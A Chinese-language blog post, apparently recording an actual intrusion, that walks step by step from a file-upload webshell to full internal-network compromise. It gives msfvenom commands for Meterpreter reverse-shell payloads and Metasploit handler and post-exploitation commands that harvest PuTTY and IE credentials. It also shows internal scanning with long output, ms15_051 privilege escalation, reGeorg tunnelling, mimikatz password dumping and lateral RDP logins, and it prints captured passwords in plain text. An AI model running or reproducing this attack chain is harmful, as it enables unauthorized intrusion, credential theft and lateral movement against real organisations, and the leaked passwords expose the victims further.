metasploit 使用 aspxshell 进行内网渗透

在http://xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell
首先用Metasploit生成反弹马,也就是生成反弹的payload:
成功生成反弹型payload:
(1)生成win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
(2)生成win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx

(3)我生成一个aspx的反弹马
然后启动msfconsole
(4)本地监听,反弹后的控制端:use exploit/multi/handler
(5)本地监听的确定用哪个payload:set payload windows/meterpreter/reverse_tcp
(6)设置本地监听的端口:set lport 7788
(7)设置本地的监听的地址:set lhost 0.0.0.0
(8)运行:run
(9)访问生成的反弹马:http://xxx.xxx.xx.xxx:/back.aspx
得到meterpreter的shell

(10)meterpreter查看路由:run get_local_subnets
(11)meterpreter 寻找putty保存的信息:run enum_putty
(12)meterpreter 寻找ie保存的密码:run post/windows/gather/enum_ie
(13)meterpreter运行cmd:shell
退出cmd shell 为:ctrl+c

(14)把meterpreter放入后台:
background
(15)添加路由(这样才能进行内网的扫描):
route add 192.168.0.0 255.255.255.0 1
route add的第一个参数是地址,第二个参数地址是掩码,第三个参数是sessis的id

(16)进行内网的主机扫描:
利用smb进行主机识别:use auxiliary/scanner/smb/smb_version
先看看这个模块需要哪些参数 show options


设置rhost:set rhosts 192.168.0.0/24
设置线程:set threads 50
运行:run
得到结果:

(17)扫描端口:
use auxiliary/scanner/portscan/tcp
设置扫描的范围:set rhosts 192.168.0.0/24
设置扫描的端口:set ports 22,23,21,3389,1433,80,8080,81,82
设置线程:set threads 50
运行:run
运行结果:
[*] 192.168.0.7:23 - TCP OPEN
[*] 192.168.0.7:80 - TCP OPEN
[*] 192.168.0.18:3389 - TCP OPEN
[*] 192.168.0.9:80 - TCP OPEN
[*] 192.168.0.9:23 - TCP OPEN
[*] 192.168.0.18:1433 - TCP OPEN
[*] 192.168.0.5:23 - TCP OPEN
[*] 192.168.0.4:23 - TCP OPEN
[*] 192.168.0.4:80 - TCP OPEN
[*] 192.168.0.6:80 - TCP OPEN
[*] 192.168.0.5:80 - TCP OPEN
[*] 192.168.0.6:23 - TCP OPEN
[*] Scanned 30 of 256 hosts (11% complete)
[*] 192.168.0.55:3389 - TCP OPEN
[*] 192.168.0.88:3389 - TCP OPEN
[*] 192.168.0.88:1433 - TCP OPEN
[*] 192.168.0.88:80 - TCP OPEN
[*] Scanned 73 of 256 hosts (28% complete)
[*] Scanned 81 of 256 hosts (31% complete)
[*] 192.168.0.120:80 - TCP OPEN
[*] 192.168.0.127:1433 - TCP OPEN
[*] 192.168.0.129:1433 - TCP OPEN
[*] 192.168.0.128:22 - TCP OPEN
[*] 192.168.0.129:80 - TCP OPEN
[*] 192.168.0.130:1433 - TCP OPEN
[*] 192.168.0.130:3389 - TCP OPEN
[*] 192.168.0.127:3389 - TCP OPEN
[*] 192.168.0.128:80 - TCP OPEN
[*] 192.168.0.135:8080 - TCP OPEN
[*] 192.168.0.129:3389 - TCP OPEN
[*] 192.168.0.130:8080 - TCP OPEN
[*] 192.168.0.134:3389 - TCP OPEN
[*] 192.168.0.135:3389 - TCP OPEN
[*] 192.168.0.135:1433 - TCP OPEN
[*] 192.168.0.131:1433 - TCP OPEN
[*] 192.168.0.135:80 - TCP OPEN
[*] 192.168.0.131:80 - TCP OPEN
[*] 192.168.0.139:80 - TCP OPEN
[*] 192.168.0.131:3389 - TCP OPEN
[*] 192.168.0.136:80 - TCP OPEN
[*] 192.168.0.139:1433 - TCP OPEN
[*] 192.168.0.136:8080 - TCP OPEN
[*] 192.168.0.136:3389 - TCP OPEN
[*] 192.168.0.136:1433 - TCP OPEN
[*] 192.168.0.139:3389 - TCP OPEN
[*] 192.168.0.139:8080 - TCP OPEN
[*] 192.168.0.120:22 - TCP OPEN
[*] Scanned 111 of 256 hosts (43% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] 192.168.0.155:22 - TCP OPEN
[*] 192.168.0.160:1433 - TCP OPEN
[*] 192.168.0.160:21 - TCP OPEN
[*] 192.168.0.160:82 - TCP OPEN
[*] 192.168.0.160:22 - TCP OPEN
[*] 192.168.0.161:8080 - TCP OPEN
[*] 192.168.0.160:3389 - TCP OPEN
[*] 192.168.0.160:80 - TCP OPEN
[*] 192.168.0.175:80 - TCP OPEN
[*] 192.168.0.172:80 - TCP OPEN
[*] 192.168.0.172:82 - TCP OPEN
[*] 192.168.0.161:22 - TCP OPEN
[*] 192.168.0.161:80 - TCP OPEN
[*] 192.168.0.175:1433 - TCP OPEN
[*] 192.168.0.175:3389 - TCP OPEN
[*] 192.168.0.172:3389 - TCP OPEN
[*] 192.168.0.170:1433 - TCP OPEN
[*] 192.168.0.176:3389 - TCP OPEN
[*] 192.168.0.176:1433 - TCP OPEN
[*] 192.168.0.178:3389 - TCP OPEN
[*] 192.168.0.176:80 - TCP OPEN
[*] 192.168.0.177:1433 - TCP OPEN
[*] 192.168.0.178:1433 - TCP OPEN
[*] 192.168.0.170:80 - TCP OPEN
[*] 192.168.0.174:3389 - TCP OPEN
[*] 192.168.0.177:3389 - TCP OPEN
[*] 192.168.0.181:80 - TCP OPEN
[*] 192.168.0.181:3389 - TCP OPEN
[*] 192.168.0.174:80 - TCP OPEN
[*] 192.168.0.181:1433 - TCP OPEN
[*] 192.168.0.179:3389 - TCP OPEN
[*] 192.168.0.179:1433 - TCP OPEN
[*] 192.168.0.182:3389 - TCP OPEN
[*] 192.168.0.182:80 - TCP OPEN
[*] 192.168.0.185:3389 - TCP OPEN
[*] 192.168.0.185:1433 - TCP OPEN
[*] 192.168.0.189:80 - TCP OPEN
[*] 192.168.0.189:21 - TCP OPEN
[*] 192.168.0.189:22 - TCP OPEN
[*] 192.168.0.185:80 - TCP OPEN
[*] 192.168.0.189:8080 - TCP OPEN
[*] 192.168.0.189:3389 - TCP OPEN
[*] 192.168.0.191:80 - TCP OPEN
[*] 192.168.0.188:3389 - TCP OPEN
[*] 192.168.0.189:1433 - TCP OPEN
[*] 192.168.0.151:22 - TCP OPEN
[*] 192.168.0.170:3389 - TCP OPEN
[*] 192.168.0.181:8080 - TCP OPEN
[*] 192.168.0.179:80 - TCP OPEN
[*] 192.168.0.191:3389 - TCP OPEN
[*] Scanned 172 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.0.200:80 - TCP OPEN
[*] 192.168.0.201:22 - TCP OPEN
[*] 192.168.0.202:22 - TCP OPEN
[*] 192.168.0.203:8080 - TCP OPEN
[*] 192.168.0.206:22 - TCP OPEN
[*] 192.168.0.205:3389 - TCP OPEN
[*] 192.168.0.204:22 - TCP OPEN
[*] 192.168.0.216:22 - TCP OPEN
[*] 192.168.0.215:3389 - TCP OPEN
[*] 192.168.0.203:80 - TCP OPEN
[*] 192.168.0.218:80 - TCP OPEN
[*] 192.168.0.230:22 - TCP OPEN
[*] 192.168.0.233:8080 - TCP OPEN
[*] 192.168.0.237:3389 - TCP OPEN
[*] 192.168.0.231:22 - TCP OPEN
[*] 192.168.0.225:8080 - TCP OPEN
[*] 192.168.0.226:22 - TCP OPEN
[*] 192.168.0.225:22 - TCP OPEN
[*] 192.168.0.227:8080 - TCP OPEN
[*] 192.168.0.232:22 - TCP OPEN
[*] 192.168.0.236:22 - TCP OPEN
[*] 192.168.0.229:22 - TCP OPEN
[*] 192.168.0.223:22 - TCP OPEN
[*] 192.168.0.234:22 - TCP OPEN
[*] 192.168.0.235:3389 - TCP OPEN
[*] 192.168.0.205:80 - TCP OPEN
[*] 192.168.0.203:22 - TCP OPEN
[*] 192.168.0.207:22 - TCP OPEN
[*] 192.168.0.227:80 - TCP OPEN
[*] 192.168.0.224:22 - TCP OPEN
[*] 192.168.0.235:1433 - TCP OPEN
[*] 192.168.0.233:22 - TCP OPEN
[*] 192.168.0.235:80 - TCP OPEN
[*] Scanned 226 of 256 hosts (88% complete)
[*] 192.168.0.238:80 - TCP OPEN
[*] 192.168.0.239:80 - TCP OPEN
[*] 192.168.0.242:80 - TCP OPEN
[*] 192.168.0.243:80 - TCP OPEN
[*] 192.168.0.241:80 - TCP OPEN
[*] 192.168.0.240:80 - TCP OPEN
[*] 192.168.0.253:23 - TCP OPEN
[*] 192.168.0.253:80 - TCP OPEN
[*] 192.168.0.254:23 - TCP OPEN
[*] 192.168.0.252:80 - TCP OPEN
[*] 192.168.0.252:23 - TCP OPEN
[*] 192.168.0.254:80 - TCP OPEN
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

在局域网里面寻找匿名ftp:
use auxiliary/scanner/ftp/anonymous
设置ip段:set rhosts 192.168.0.0/24
设置线程:set threads 50

运行结果:

在webshell 里面
查看权限:whoami

权限很高:

如果权限低,则查看systeminfo
主要看里面打的补丁:

补丁没有打,所以可以用ms15_051 这个exp秒掉

然后添加一个账户

然后上reGeorg
上传:tunnel.aspx
访问:http://xxx.xxx.xxx.xx/tunnel.aspx
如果发现:Georg says, 'All seems fine' 证明可以使用:
执行:python reGeorgSocksProxy.py -p 1090 -u http://xxx.xxx.xxx.xxx/download/tunnel.aspx
使用proxychains访问远程桌面:
proxychains rdesktop -a 16 -u hehe -p Admin#123 127.0.0.1

然后上传猕猴桃把密码搞出来:

然后用管理员的账户登陆上去:

然后开远程登陆记录,发现管理员用远程登陆记住了192.168.0.136的密码:

登陆上去,然后脱下来本机密码:

截获一个密码是通用密码:
administraror
xseries_ellassay

登陆开了3389的主机
首先:192.168.0.160

然后:192.168.0.170
用户名:xz
密码:xz


用通用密码登陆192.168.0.181

然后通用密码登陆192.168.0.170:

发表评论

电子邮件地址不会被公开。 必填项已用*标注